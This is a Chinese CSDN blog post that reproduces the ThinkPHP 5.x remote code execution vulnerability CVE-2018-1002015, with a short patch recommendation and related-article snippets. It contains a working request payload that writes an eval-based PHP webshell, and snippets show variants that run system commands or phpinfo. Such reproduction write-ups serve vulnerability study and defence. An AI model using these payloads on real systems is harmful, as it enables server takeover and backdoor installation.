thinkphp命令执行漏洞(CVE-2018-1002015)

最新推荐文章于 2024-04-21 21:36:34 发布
最新推荐文章于 2024-04-21 21:36:34 发布
阅读量502 收藏 8
点赞数 8
文章标签: web安全 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135270962
版权

漏洞描述:

ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。

复现过程:

1.访问ip:port

2.抓包,修改get请求

Payload

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=webshell.php&vars[1][]=<?php%20eval($_GET[cmd]);?>

3.蚁剑连接

修复建议:

用户可下载官方发布的补丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838

慕筱蚺
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php think命令,thinkphp 命令执行
weixin_28755847的博客
03-12 1794
ini_set('memory_limit','3048M');set_time_limit(0);include'./vendor/autoload.php';define('DS',DIRECTORY_SEPARATOR);defined('APP_PATH')ordefine('APP_PATH',dirname($_SERVER['SCRIPT_FILENAME']).DS)...
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 2.x 任意代码执行漏洞
EC_Carrot的博客
08-17 128
漏洞详细 详细请看:https://vulhub.org/#/environments/thinkphp/2-rce/ 漏洞复现 直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行代码phpinfo():
vulfocus靶场thinkphp命令执行cve-2018-1002015
最新发布
没有故事
04-21 217
漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。thinkPHP 5.0.x版本和5.1.x版本中存在。使用工具: thinkphp综合利用工具,然后使用webshell工具进行连接即可。
thinkphp漏洞复现
YouthBelief的博客
10-25 2851
thinkphp漏洞前言一、thinkphp-2x-rce 代码执行0x01 漏洞描述0x02 影响版本0x03 漏洞利用0x04 漏洞修复二、thinkphp 代码执行 (CNVD-2018-24942)0x01 漏洞描述0x02 影响范围0x03 漏洞利用这就完成了,这边我们引用下大佬的poc0x04 漏洞修复三、 thinkphp3.2.x 代码执行0x01漏洞描述0x02影响范围0x03漏洞利用payload0x04漏洞修复四、thinkphp 命令执行CVE-2018-1002015)0x01
Docker入门 服务部署的艺术
SStringss的博客
03-06 436
Docker学习笔记
vulfocus打靶笔记
weixin_61913198的博客
10-19 160
1.名称: 命令执行漏洞 2.thinkphp-2x-rce 代码执行 3.thinkphp 代码执行 (CNVD-2018-24942) 4.名称: drupal 代码执行CVE-2019-6340) 5.名称: Spring Boot 目录遍历 (CVE-2021-21234) 6.名称: tomcat 文件上传 (CVE-2017-12615)
漏洞复现-thinkphp-代码执行】vulfocus/thinkphp-cve_2018_1002015
10-14 1491
thinkphp-代码执行】函数
CVE-2018-1002015thinkphp命令执行漏洞
liuxiaoning_的博客
09-20 678
复现并分析【CVE-2018-1002015thinkphp命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞,利用该漏洞执行命令,写入后门,获取webshell。
thinkphp-cve_2018_1002015
m0_49025459的博客
12-06 632
ThinkPHP ThinkPHP(FCS)是一个轻量级的中型框架,是从Java的Struts结构移植过来的中文PHP开发框架。它使用面向对象的开发结构和MVC模式,并且模拟实现了Struts的标签库,各方面都比较人性化,熟悉J2EE的开发人员相对比较容易上手,适合php框架初学者。 ThinkPHP的宗旨是简化开发、提高效率、易于扩展,其在对数据库的支持方面已经包括MySQL、MSSQL、Sqlite、PgSQL、 Oracle,以及PDO的支持。ThinkPHP有着丰富的文档和示例,框架的兼容性较强,但
php命令执行漏洞利用,ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析
weixin_33989001的博客
03-21 873
1漏洞利用方式5.0版本POC(不唯一)命令执行:?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[系统命令]文件写入:?s=index/thinkapp/invokefunction&function=call_user_func_arr...
thinkphp-bjyblog 开源博客系统 v1.1
10-11
闲暇之时使用thinkphp开发了一个个人博客用来整理技能知识; 如今博客的功能基本已经齐备;特开源以供各类猿们使用; 亦可以作为初学thinkphp的同学们的参考源代码; 此博客程序
thinkphp集成前端脚手架Vue-cli的教程图解
01-21
本文主要介绍怎么在Thinkphp中集成后台前端脚手架框架Vue-Cli。 一.安装Vue-Cli到Thinkphp中 1.1.1 检查是否安装node 终端输入npm的指令如果没有安装的话会提示未找到指令 正确的姿势如下图,说明已经安装了node...
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 944
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
thinkphp 命令执行
xiaopzi的博客
01-16 1313
echo $PATH/root/perl5/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin这里/usr/local/bin优先于/usr/bin。上面的意思是,linux执行任何命令,都会先去/usr/local/sbin,如果没有再去/usr/local/bin下面,如果还没有就去/usr/local/bin,以此类推,如果都没有,就会提示找不到命令。/usr/bin存放一些用户命令,如led(控制LED灯的)。
命令执行php框架代码,ThinkPHP远程命令执行漏洞原理及复现
weixin_42388716的博客
03-09 267
2018年12月11日,exploit-db更新了一个thinkphp框架远程代码执行漏洞exploit地址:https://www.exploit-db.com/exploits/45978由于框架对控制器名没有进行足够的检测导致在没有开启强制路由的情况下getshell漏洞影响范围Thinkphp 5.1.0 - 5.1.31Thinkphp 5.0.5 - 5.0.23安装:下载地址http...
ThinkPHP5.0使用命令执行代码逻辑
BoYou233的博客
07-23 1849
创建一个自定义命令类文件,新建application/common/command/Hello.php <?php namespace app\common\command; use think\console\Command; use think\console\Input; use think\console\input\Argument; use think\console\input\Option; use think\console\Output; use think\Db; cl
thinkphp-errors漏洞
04-08
thinkphp-errors漏洞是指在使用ThinkPHP框架时存在的一种安全漏洞。该漏洞的主要原因是在错误处理机制中,未对异常信息进行适当的过滤和处理,导致攻击者可以通过构造恶意请求,获取敏感信息或执行任意代码。 具体来说,当应用程序发生错误时,ThinkPHP框架会将错误信息显示在页面上,包括敏感信息如数据库连接信息、文件路径等。攻击者可以利用这些信息进行进一步的攻击,比如尝试注入恶意代码、获取数据库敏感信息等。 为了防止thinkphp-errors漏洞的利用,可以采取以下措施: 1. 关闭错误显示:在生产环境中,应该关闭错误显示,避免将敏感信息暴露给攻击者。可以在配置文件中设置`app_debug`为`false`。 2. 自定义错误页面:可以自定义错误页面,将错误信息隐藏起来,同时提供友好的提示信息给用户。 3. 过滤异常信息:在异常处理机制中,对异常信息进行适当的过滤和处理,确保不会泄露敏感信息。 4. 及时更新框架版本:及时关注ThinkPHP官方发布的安全更新,并及时升级框架版本,以修复已知的漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值